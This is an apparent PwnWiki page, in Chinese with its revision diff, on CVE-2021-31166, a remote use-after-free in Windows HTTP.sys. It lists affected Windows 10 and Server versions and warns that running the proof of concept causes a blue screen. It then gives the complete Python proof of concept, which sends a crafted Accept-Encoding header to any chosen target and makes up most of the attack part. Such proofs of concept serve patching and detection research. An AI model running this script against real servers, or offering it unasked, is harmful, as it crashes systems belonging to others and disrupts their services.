Difference between revisions of "CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞"
From PwnWiki
(Marked this version for translation) |
|||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 16: | Line 16: | ||
==POC== | ==POC== | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
⚠️️執行該POC會出現藍屏。 | ⚠️️執行該POC會出現藍屏。 | ||
</translate> | </translate> | ||
| Line 40: | Line 41: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:3--> |
</translate> | </translate> | ||
https://github.com/0vercl0k/CVE-2021-31166 | https://github.com/0vercl0k/CVE-2021-31166 | ||
Latest revision as of 09:36, 18 May 2021
漏洞影響
Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems
POC
⚠️️執行該POC會出現藍屏。
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
parser.add_argument('--target', required = True)
args = parser.parse_args()
r = requests.get(f'http://{args.target}/', headers = {
'Accept-Encoding': 'doar-e, ftw, imo, ,',
})
print(r)
main()